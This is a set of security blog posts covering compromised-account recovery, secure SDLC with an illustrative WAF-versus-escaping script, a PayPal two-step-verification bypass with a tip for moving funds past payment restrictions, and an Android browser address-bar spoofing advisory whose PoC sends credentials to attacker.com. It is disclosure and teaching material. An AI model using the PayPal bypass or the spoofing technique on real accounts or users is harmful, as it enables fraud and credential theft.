We must next purge your devices of any malicious processes. There are many free antivirus solutions that do a great job at eliminating these threats in a simple scan, but don’t be scammed by a fake. Do your research for the latest, well-known and best free or paid (depending on your budget) anti-malware solution. Read third-party reviews. <br />
<br />
Now, I know that anti-virus protection is not always a 100% solution, as there are many obfuscation and crypting methods that can be used to hide malware signatures from antivirus scans, but the big antivirus companies are very competitive and new definition updates roll out on a regular basis. At the time of writing this, the average private crypts are only FUD (fully undetectable) for approximately one month, and the average public crypts which actually are FUD (most are never FUD from the beginning) are only so for about one or two weeks. <br />
<br />
While an anti-virus scan will most likely eliminate the threats on your PC, it is still advised that you back up your important files and data, format your hard drive and reinstall your operating system. For devices other than a PC, follow your manufacturer’s guidelines for resetting your device to default factory settings.<br />
<h4 style="text-align: left;">
Damage Control</h4>
An often overlooked aspect of securing your accounts and services is what to do afterward. It is important, because you may not know what messages have been sent to others or what was done in your name. <br />
<br />
Financial services should be your first concern. Check your account activity for any purchases you do not recognize. Be sure to call your bank or credit card companies and have new card numbers issued. <br />
<br />
As for social media, don’t be embarrassed or ashamed to post a public announcement for everyone to see. Almost everyone has already seen social media accounts taken over by an attacker or bot and posting malicious links all over the internet. These things happen all of the time. This is nothing new, and people will not think of you as being stupid or view you in a different light. They will instead judge you based on your quick and calm ability to assess and take control of the situation, most likely rewarding you with support and respect. <br />
<br />
For formal or social media accounts, a statement like this should be sufficient:<br />
<br />
“<i>Hello Everyone. I have an important and unfortunate announcement to make. It appears that some of my accounts were compromised (hacked). I noticed suspicious activity on (date XX/XX/XX ) and while I am actively securing everything and the damage seems minimal, there’s no way for me to know the full extent or length of time of the breach. If you noticed any suspicious activity from my account or strange messages, please inform me immediately. Also if you have gotten any links from “me” recently, do not follow them. Instead ask me about them after I have finished securing all of my accounts, devices and services. I appreciate your support. Have a great day, everyone and apologies if there has been any inconvenience</i>.”<br />
<br />
<b>A shorter version: </b><br />
<br />
“One of my accounts was recently hacked. Things seem fine so far. I’m now securing it. Be sure to let me know of anything suspicious from my account. Thanks.”<br />
<br />
And last, but not least: prevention. This could have saved you a lot of effort and grief to begin with. Keep up to date with the latest security practices for all of your online services, accounts and devices, because a foothold in one of them can often allow access to the others.<br />
<br />
<h3 style="text-align: left;">
About the Author</h3>
</div>
<div>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlPEJQuxsDxax9BgcrI6Gmb9vTGNE3aFkBPHJiCEjhpkb4Y6t39cfTNXDk9GZQUb_JnFRKaCbKznUi2k_SGL5iSCDg1KN_o-QCGWPiyEbaugJYMOO2r4F-8KtmpC_kOEWEvFT5nUmJIqI/s1600/12571269_544229605743233_146934175_n.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlPEJQuxsDxax9BgcrI6Gmb9vTGNE3aFkBPHJiCEjhpkb4Y6t39cfTNXDk9GZQUb_JnFRKaCbKznUi2k_SGL5iSCDg1KN_o-QCGWPiyEbaugJYMOO2r4F-8KtmpC_kOEWEvFT5nUmJIqI/s1600/12571269_544229605743233_146934175_n.jpg" /></a>My name is <b>Gary Lewis</b>. While I am not as knowledgeable and skilled as many of your programming and security experts and teachers are, I do have real-world experience. There are a lot of technical skills that I'm not an expert at, but I was involved in a lot of things I will not list here and I do know how hacks are being done in the real world, rather than textbook knowledge. I retired from that scene some time ago and decided to pursue philosophy, art, and poetry. Currently, I am working on 3 series of dark themed art and poetry books entitled Paradoxium, Inevitum, and Relativium about Chaos, Order, and Time. I still stay up to date on data security and am happy to write an article for my good friend Rafay, when he wishes, but my days of hacking are over. So if you have any questions or inquiries, please refer to him and his team. They are very knowledgeable in their field of study.</div>
</div>
Farhan Azam<br />
<b>Secure Application Development And Modern Defenses</b> (published 2015-12-18, updated 2020-05-27)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg3cLwB6D5ri-dsd7rvLbTKSDAFIrDW4CI1tAs7GZlZMdsQMLntoGzK1c1CCpQyyXZHW9Y8L-hIDG3fCUFmSy9O9-1-tbDb16MPHJDddFsrsAOT8hXbN29UeFEbaScRFeKiNN-KbfX4fY/s1600/hacker+security-med_.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg3cLwB6D5ri-dsd7rvLbTKSDAFIrDW4CI1tAs7GZlZMdsQMLntoGzK1c1CCpQyyXZHW9Y8L-hIDG3fCUFmSy9O9-1-tbDb16MPHJDddFsrsAOT8hXbN29UeFEbaScRFeKiNN-KbfX4fY/s400/hacker+security-med_.jpg" width="400" /></a></div>
<div rtenodeid="3" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<h4>
Abstract</h4>
</div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">When it comes to the internet, security has always been an afterthought. Strong evidence for this can be seen in the history of the internet itself. The internet was created by the US military back in 1969, branded "Arpanet" at that time. In 1973, ARPANET created the TCP/IP protocol suite, which later enabled the development of protocols such as SMTP, POP3, FTP and TELNET in the 1980s, and HTTP in 1991. </span><br />
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">All of these protocols can easily be eavesdropped upon by an attacker because they do not encrypt traffic. Their secure counterparts, such as FTPS, SMTPS, SSH and HTTPS, were released only later, since at the time connecting people and building features was the priority. Had security been present by design, we would not face these problems today. </span><br />
<a name='more'></a>The same is true of how we develop products today: security is treated as an afterthought rather than a built-in feature, and security breaches occur as a result. In this article we will talk about secure application development and why the SDLC (System Development Lifecycle) is an ideal model for building secure products.<br />
<br />
The model follows the "Security By Design" and "Defense In Depth" approaches. The idea behind this model is that security should be an essential part of all phases of the SDLC so that bugs are addressed during the early stages of development. Fixing security issues at earlier stages of the development cycle directly reduces cost, time, effort and resources.</div>
<div rtenodeid="4" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<h4>
Application Layer Security Attacks</h4>
</div>
<div rtenodeid="4" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">As time passes, we witness a rise in application security attacks: insecurity has progressed upward through the layers of the OSI model. In the 80s and 90s most attacks were related to Layers 1, 2 and 3 of the OSI model; today we have developed strong defenses at the network level, but application layer security remains a big challenge. </span><br />
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">A report by Gartner Research states that 75% of attacks today occur at the application layer of the OSI model.</span> According to a survey by Trustwave, 82% of web applications are vulnerable to XSS attacks. According to another survey, 80% of all security incidents in the financial sector occur due to Cross-site Scripting. Therefore, building defenses at the application layer is mandatory.</div>
<div rtenodeid="4" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<h4>
Application Layer Defenses/Approach</h4>
</div>
<div rtenodeid="4" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">Over time, multiple defenses and approaches have been established at the application level, the most notable being the "<b>Web Application Firewall</b>" and "<b>Runtime Application Self-Protection</b>". </span><br />
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">A Web Application Firewall can be used as an additional layer of security; however, all WAFs rely upon a blacklist, i.e. "reject known bad", as whitelisting mode is not practically applicable in the real world (it is not easy to implement). This is largely because the majority of web applications are dynamic, and it is very difficult to predict all possible inputs in order to write a whitelist of what is allowed. The blacklist, however, is not really effective, and this has been proven in the past. As a matter of fact, bypassing WAFs is my day-to-day job, and back in 2013 I wrote a cheatsheet, "<b><a href="http://www.rafayhackingarticles.net/2013/12/bypassing-modern-wafs-xss-filters-cheat.html" target="_blank">Bypassing Modern WAF's XSS Filters</a></b>", containing bypasses for the top Web Application Firewalls. </span><br />
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;"><b>Runtime Application Self-Protection </b>is a relatively new approach to preventing application layer attacks, which empowers the application to protect itself against attacks in real time. A RASP sits at each junction point of the application, such as between the application and the database, the file system and the network, where it identifies and blocks malicious activity, giving the application the ability to protect itself. The problem with this solution, however, is that it is still based upon a blacklist, it is very costly, and it requires a lot of time to mature. </span><br />
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">“<b>The cost of removing an application security vulnerability during the design phase ranges from 30-60 times less than if removed during production.</b>”- NIST, IBM, and Gartner Group</span><br />
<div style="font-family: calibri, arial, helvetica, sans-serif; font-size: 16px;">
<br /></div>
<div style="font-family: calibri, arial, helvetica, sans-serif; font-size: 16px;">
The bottom line is that <strong>you cannot write vulnerable code and rely upon a WAF, </strong><span rtenodeid="28" style="font-size: 12pt;"><strong>RASP or other protection mechanisms to protect your application.</strong></span></div>
</div>
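As an added illustration (not code from the original article), here is a toy "reject known bad" rule beside the two alternatives the text contrasts it with: an allowlist for a field whose shape is predictable, and non-vulnerable code that encodes output for its HTML context. The rule set, the template, the field name and the sample inputs are all constructed for this example.

```python
import html
import re

# Toy blacklist in the spirit of a WAF signature: reject anything containing
# one of a few well-known dangerous tokens (constructed rule set).
BLACKLIST = re.compile(r"script|javascript:|onerror|onload", re.IGNORECASE)

# "Accept known good": practical only where the field's shape is predictable,
# which is why the text says whitelisting rarely works for a whole dynamic app.
USERNAME_ALLOWLIST = re.compile(r"^[A-Za-z0-9_]{1,32}$")

# Constructed sample values submitted to a "display name" field.
SAMPLES = {
    "plain": "Alice",
    "false_positive": "Please email my transcript",  # harmless, yet blacklisted
    "unknown_markup": "<marquee>Hi</marquee>",       # not on the list, still injects
    "angle_text": "I <3 security",                   # a '<' that is not a tag
}


def blacklist_allows(value: str) -> bool:
    """WAF decision: True means the request is forwarded to the application."""
    return BLACKLIST.search(value) is None


def allowlist_allows(value: str) -> bool:
    """Allowlist decision for a field known to be a simple username."""
    return USERNAME_ALLOWLIST.fullmatch(value) is not None


def render_vulnerable(name: str) -> str:
    """The vulnerable code a WAF is asked to cover: raw string interpolation."""
    return f"<p>Hello {name}</p>"


def render_hardened(name: str) -> str:
    """Non-vulnerable code: encode for the HTML text context, so input stays inert."""
    return f"<p>Hello {html.escape(name, quote=True)}</p>"


def injected_tags(rendered: str) -> int:
    """Number of tags in the output beyond the template's own <p> and </p>."""
    return len(re.findall(r"<[A-Za-z/!]", rendered)) - 2


def evaluate(value: str) -> dict:
    """Compare how each layer treats one input."""
    return {
        "blacklist_allows": blacklist_allows(value),
        "allowlist_allows": allowlist_allows(value),
        "vulnerable_injects": injected_tags(render_vulnerable(value)),
        "hardened_injects": injected_tags(render_hardened(value)),
    }


def weak_spots() -> dict:
    """Where the blacklist gets it wrong: it blocks harmless text, or forwards
    input that the vulnerable template turns into live markup. The hardened
    renderer never produces extra markup, whatever the WAF decided."""
    results = {name: evaluate(v) for name, v in SAMPLES.items()}
    return {
        "false_positives": sorted(n for n, r in results.items()
                                  if not r["blacklist_allows"] and r["vulnerable_injects"] == 0),
        "false_negatives": sorted(n for n, r in results.items()
                                  if r["blacklist_allows"] and r["vulnerable_injects"] > 0),
        "hardened_ever_injects": any(r["hardened_injects"] > 0 for r in results.values()),
    }


if __name__ == "__main__":
    for sample_name, sample_value in SAMPLES.items():
        print(f"{sample_name:15} {evaluate(sample_value)}")
    print(weak_spots())
```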
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<h4>
Secure SDLC </h4>
</div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<div style="font-family: calibri, arial, helvetica, sans-serif;">
</div>
<div style="font-family: calibri, arial, helvetica, sans-serif; line-height: 150%;">
<span style="font-family: "calibri" , sans-serif;">The defenses discussed above do help improve our security model. However, in my opinion, it is the wrong way of solving the problem. The best approach is for the application itself to carry the ability to protect itself and therefore be built with security in mind from day one. Experts recommend that security be embedded into all stages of the SDLC, i.e. requirements gathering, design, development, testing and implementation.</span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGbEAeNKP7XHILn-z7ORH96L3slN72Ton7hfCl_6sUDloiK0SGuLO5kaX01Oeb6qFwrPDYUYxM0TILQDUn80ri57FzSFF22LEgpqj2utddMTNFl7AWZQUxhPjlNiwZqvU-rcR0Hz-Zggg/s1600/600px-Security_in_the_SDLC_Process.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGbEAeNKP7XHILn-z7ORH96L3slN72Ton7hfCl_6sUDloiK0SGuLO5kaX01Oeb6qFwrPDYUYxM0TILQDUn80ri57FzSFF22LEgpqj2utddMTNFl7AWZQUxhPjlNiwZqvU-rcR0Hz-Zggg/s640/600px-Security_in_the_SDLC_Process.png" width="640" /></a></div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
Let's talk about how security could fit into all stages of SDLC:</div>
<div rtenodeid="38" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<br rtenodeid="39" /></div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<strong>i) Requirements</strong></div>
<div rtenodeid="41" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<div style="line-height: 150%;">
<span style="font-family: "calibri" , sans-serif;"><br /></span></div>
<div style="line-height: 150%;">
<span style="font-family: "calibri" , sans-serif;">The first phase of the SDLC is "Requirements", in which the project scope and goals are set. In this phase, OWASP recommends establishing the security requirements of the application. The customer's requirements should be checked against security standards such as password policies, secure network protocols, etc.</span></div>
</div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<br /></div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<strong>ii) Design </strong></div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<div style="line-height: 150%;">
<span style="font-family: "calibri" , sans-serif;">In the design phase, OWASP recommends building the design with security in mind. This involves what is known as <span style="background: white;">threat modelling: an approach that analyzes the security of an application in order to identify and mitigate threats, which yields the security plan. The following is a great presentation on how threat modelling should be performed. </span></span></div>
<div style="line-height: 150%;">
<br /></div>
</div>
<iframe allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/ZtSrcq7gscE" width="577"></iframe>
<br />
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<strong><br /></strong></div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<strong>iii) Development </strong></div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<div style="line-height: 150%;">
<br /></div>
<span style="font-family: "calibri" , sans-serif; line-height: 150%;">In the development phase, OWASP recommends that developers follow "Secure Coding Standards", for which the organization must conduct secure coding awareness training for developers, because guidelines are often overlooked. Apart from that, source code reviews must be done by the internal team. It is also recommended to have a review conducted by a third party to surface additional findings.</span><br />
<strong><br /></strong>
<strong>iv) Testing </strong></div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<div style="line-height: 150%;">
<br /></div>
<div style="line-height: 150%;">
<span style="font-family: "calibri" , sans-serif;">In the testing phase, OWASP recommends performing a penetration test, including an infrastructure assessment, in order to verify that the findings from the design and development phases have been properly fixed. Both static and dynamic code analysis should be thoroughly performed.</span></div>
<div style="line-height: 150%;">
<br /></div>
<div style="line-height: 150%;">
<span style="font-family: "calibri" , sans-serif;">Special attention should be paid to business logic bugs, which cannot otherwise be found by automated scanners, as the business logic varies for every application. Effort made in the second phase, i.e. design, can reduce the number of business logic bugs significantly.</span></div>
<br />
<div style="line-height: 150%;">
<br /></div>
<strong>v) Deployment </strong></div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">Deployment is the phase in which your application moves from the development environment into production. In this phase, OWASP recommends conducting the migration from development to production securely and ensuring that post-production security requirements are met.</span><br />
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">In case you would like to learn more about Secure SDLC, I would recommend the following presentation -</span><span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif; font-size: 16px;"> "</span><strong style="font-family: calibri, arial, helvetica, sans-serif; font-size: 16px;"><a href="https://www.owasp.org/images/7/76/Jim_Manico_(Hamburg)_-_Securiing_the_SDLC.pdf" target="_blank">Secure Development Lifecycle</a></strong><span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif; font-size: 16px;">".</span></div>
<div rtenodeid="74" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px; text-decoration: underline;">
<strong style="line-height: 150%;"><span style="font-family: "calibri" , sans-serif;"><br /></span></strong>
<strong style="line-height: 150%;"><span style="font-family: "calibri" , sans-serif;">Security is an ongoing process; there is no specific set of requirements that, once met, yields 100% security. </span></strong></div>
<div rtenodeid="76" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px; text-decoration: underline;">
<br />
<div style="line-height: 150%;">
<span style="font-family: "calibri" , sans-serif;">It should be noted that even after introducing security into every process of the SDLC, 100% security cannot be achieved. However, the threat probability can be reduced. As security analysts, we have to close a hundred doors through which an attacker could enter, while the attacker only needs one. What appeals most to me about this approach is that it is proactive, not reactive, which is how most application development is done nowadays.</span></div>
</div>
</div>
Rafay<br />
<b>Paypal Mobile Verification And Payment Restrictions Bypass</b> (published 2015-09-25, updated 2020-05-27)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwx__fqv5aWdGKChPheO0chyQTXinqO6xMMubuXbYIrQD-q7a_e4rKhSe1wGjaXMETBULHiIJclSVWvlUC_VA6PdsgjpzJrbTXfxU1B-16xqhyphenhyphenFwyVtFvR-O53UjdyLmT5RkfkXmiPvM0/s1600/download.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwx__fqv5aWdGKChPheO0chyQTXinqO6xMMubuXbYIrQD-q7a_e4rKhSe1wGjaXMETBULHiIJclSVWvlUC_VA6PdsgjpzJrbTXfxU1B-16xqhyphenhyphenFwyVtFvR-O53UjdyLmT5RkfkXmiPvM0/s400/download.jpg" width="400" /></a></div>
<br />
In this post I would like to share a very simple logic flaw I found earlier this year: a way to circumvent mobile verification by using a different portal to log into a PayPal account. The flaw lies in the fact that PayPal does not perform two-step verification/authorization checks on all of the different portals that can be used to log into a PayPal account. Ideally, there should be a centralized authentication mechanism for authenticating the user; otherwise the additional authorization checks have to be applied to every portal that can be used to log into a PayPal account.<br />
<a name='more'></a><br />
In this case, the mobile activation page could be used to log into the PayPal account without needing a mobile phone.<br />
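The design flaw described above, as an added example that is not PayPal's code and only models the logic: two login portals that each decide on their own whether to require the second factor, beside a fix in which every portal hands off to one central function that issues sessions. The account data, portal names and session format are constructed for this example.

```python
import hmac
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


@dataclass
class Account:
    email: str
    password: str          # plaintext only to keep the model small
    mfa_enrolled: bool     # has the user set up mobile verification?


@dataclass
class LoginRequest:
    email: str
    password: str
    portal: str                  # which entry point the user came through
    otp_verified: bool = False   # did this request complete the second factor?


Handler = Callable[[LoginRequest], Optional[str]]

# Constructed test account with mobile verification enrolled.
ACCOUNTS: Dict[str, Account] = {
    "alice@example.com": Account("alice@example.com", "correct-horse", mfa_enrolled=True),
}


def password_ok(req: LoginRequest) -> Optional[Account]:
    """First factor, shared by every flow below."""
    acct = ACCOUNTS.get(req.email)
    if acct is None or not hmac.compare_digest(acct.password, req.password):
        return None
    return acct


# --- Vulnerable design: every portal implements its own login flow ----------

def web_login(req: LoginRequest) -> Optional[str]:
    """Main portal: enforces the second factor when the account has it enrolled."""
    acct = password_ok(req)
    if acct is None or (acct.mfa_enrolled and not req.otp_verified):
        return None
    return f"session:{acct.email}"


def mobile_activate_login(req: LoginRequest) -> Optional[str]:
    """Secondary portal: only the password is checked, the second factor is
    never consulted, so this entry point bypasses mobile verification."""
    acct = password_ok(req)
    if acct is None:
        return None
    return f"session:{acct.email}"


VULNERABLE_PORTALS: Dict[str, Handler] = {
    "web": web_login,
    "mobile_activate": mobile_activate_login,
}


# --- Fixed design: portals only collect credentials, one function decides ---

def issue_session(req: LoginRequest) -> Optional[str]:
    """Central authentication: the only place a session can be created, so the
    second-factor rule applies to every portal, present and future."""
    acct = password_ok(req)
    if acct is None or (acct.mfa_enrolled and not req.otp_verified):
        return None
    return f"session:{acct.email}"


FIXED_PORTALS: Dict[str, Handler] = {
    "web": issue_session,
    "mobile_activate": issue_session,
}


def login(req: LoginRequest, portals: Dict[str, Handler]) -> Optional[str]:
    """Dispatch a request to the portal it arrived at."""
    handler = portals.get(req.portal)
    return handler(req) if handler else None


def portals_skipping_mfa(portals: Dict[str, Handler]) -> List[str]:
    """Audit helper: which portals hand out a session for an MFA-enrolled
    account without the second factor? Empty for a correct design."""
    leaky = []
    for name in portals:
        probe = LoginRequest("alice@example.com", "correct-horse", portal=name)
        if login(probe, portals) is not None:
            leaky.append(name)
    return sorted(leaky)


if __name__ == "__main__":
    print("vulnerable design, portals skipping MFA:", portals_skipping_mfa(VULNERABLE_PORTALS))
    print("fixed design, portals skipping MFA:     ", portals_skipping_mfa(FIXED_PORTALS))
```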
<br />
<b><a href="https://www.paypal.com/us/cgi-bin/?cmd=_mobile-activate-outside">https://www.paypal.com/us/cgi-bin/?cmd=_mobile-activate-outside</a></b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir-7TWMEWvg6kSY_NSHudl5yr4Q6UlhaMfyFfGsEIvKS9gx4PxwYJRoiftz4K9ctI-ztu7_U4XnNftEoqGvbWXUAtAwc26RZy3mTLL6oSbXd8D-4w8P4km3c3_ZPBXP5IM_pMOFvjzVyk/s1600/sss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="572" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir-7TWMEWvg6kSY_NSHudl5yr4Q6UlhaMfyFfGsEIvKS9gx4PxwYJRoiftz4K9ctI-ztu7_U4XnNftEoqGvbWXUAtAwc26RZy3mTLL6oSbXd8D-4w8P4km3c3_ZPBXP5IM_pMOFvjzVyk/s640/sss.png" width="577" /></a></div>
<br />
<h4>
Demonstration</h4>
<iframe allowfullscreen="" frameborder="0" height="281" mozallowfullscreen="" src="https://player.vimeo.com/video/140455516" webkitallowfullscreen="" width="500"></iframe> <br />
<br />
Unfortunately, the bug was marked as a duplicate, so it was not eligible for a bounty; however, that really doesn't matter, as the fun and the learning are more important. There are still other ways to circumvent mobile verification, which I did not wish to report.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQDJXM-J65SHpf1O_bS0Jx92J6HhobNsnK8XgDs46tW6_QhfOiT9Ut5-OsLeDw0WXVs3JldfefmFu8r4TVIIE3Y5eXhuyaaYFCQZMuib6klwmmedIQypzKUXjJJSceVZFJuce869smvmE/s1600/fix.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQDJXM-J65SHpf1O_bS0Jx92J6HhobNsnK8XgDs46tW6_QhfOiT9Ut5-OsLeDw0WXVs3JldfefmFu8r4TVIIE3Y5eXhuyaaYFCQZMuib6klwmmedIQypzKUXjJJSceVZFJuce869smvmE/s640/fix.png" style="cursor: move;" width="577" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
Bypassing Payment Restrictions</h4>
<div class="separator" style="clear: both; text-align: left;">
After the bypass, PayPal might restrict you from transferring funds to another account; however, there is a simple way of bypassing that as well: create a donation button or any other payment button in PayPal and use it directly to transfer money, as PayPal does not enforce any restriction on it.</div>
<h4>
Example</h4>
<b><a href="https://www.paypal.com/id/cgi-bin/webscr?cmd=_flow&SESSION=OvGwImW-aZGi7_Jf-oBOYlXFljX6KfnUMxeUoxyow7Woq8ZZYb7SihFpKQy&dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198d1a93361f052308ac20c1249d8113f4c">https://www.paypal.com/id/cgi-bin/webscr?cmd=_flow&SESSION=OvGwImW-aZGi7_Jf-oBOYlXFljX6KfnUMxeUoxyow7Woq8ZZYb7SihFpKQy&dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198d1a93361f052308ac20c1249d8113f4c</a></b></div>
Rafay<br />
<b>Android Browser All Versions - Address Bar Spoofing Vulnerability - CVE-2015-3830</b> (published 2015-05-18, updated 2020-05-27)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi77BGdp91mBfEE1FbYxZxc2C0U21ZgvytwpN8GsOSW1K80qvut4flgi1JBRY1bm_1X1qzRHXSjbUp-xsf5huiITwEW_MYmwEaNHM04a3aLTQPpo7duFIgpGbnboe7r48-ZWK0GkE2w5ns/s1600/email-spoofing.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi77BGdp91mBfEE1FbYxZxc2C0U21ZgvytwpN8GsOSW1K80qvut4flgi1JBRY1bm_1X1qzRHXSjbUp-xsf5huiITwEW_MYmwEaNHM04a3aLTQPpo7duFIgpGbnboe7r48-ZWK0GkE2w5ns/s320/email-spoofing.jpg" width="320" /></a></div>
<h4>
Introduction</h4>
<div class="separator" style="clear: both; text-align: left;">
Google's security team themselves <a href="https://www.google.com/about/appsecurity/reward-program/" rel="nofollow" target="_blank">state that</a> "We recognize that the address bar is the only reliable security indicator in modern browsers". If the only reliable security indicator can be controlled by an attacker, it can have adverse effects, for instance tricking users into supplying sensitive information to a malicious website, because an address bar that points to the correct website easily leads users to believe they are visiting the legitimate site. </div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<a name='more'></a><br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
Android Stock Browser Address Bar Spoofing</h4>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
A few months ago I discovered an address bar spoofing vulnerability affecting the Android Stock Browser on all Android versions. The tests were carried out on Android Lollipop and later confirmed on prior versions. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The issue is caused by the browser failing to handle 204 "No Content" responses when combined with window.open, which allows the address bar to be spoofed.</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
Steps To Reproduce</h4>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<b>1)</b> Visit <a href="http://jsfiddle.net/dy4swq4o/show/" rel="nofollow" target="_blank">http://jsfiddle.net/dy4swq4o/show/</a> with an unpatched Android Stock Browser.</div>
<div class="separator" style="clear: both;">
<b>2)</b> Click the "Click here to be redirected" button.</div>
<div class="separator" style="clear: both;">
<b>3) </b>The Android browser will open a new tab with the address bar pointing to "<b>http://www.google.com/csi</b>", which makes the victim believe they are in fact visiting a legitimate website; in reality the page is not hosted on google.com. </div>
<div class="separator" style="clear: both;">
<b>4) </b>As soon as the victim enters his/her credentials, they are sent to <b>attacker.com</b>. </div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<b>Note: Please visit <a href="https://jsfiddle.net/dy4swq4o/" rel="nofollow" target="_blank">https://jsfiddle.net/dy4swq4o/</a> for unrendered version of the POC.</b></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
Proof of Concept</h4>
<div class="separator" style="clear: both; text-align: left;">
The following is a screenshot of a Samsung Galaxy S5 running the latest Android stock browser. As you may notice, the address bar points to https://www.google.com/csi (which returns a 204 response), which makes the user believe that he is in fact visiting a legitimate site, although the page is hosted on the attacker's domain. </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
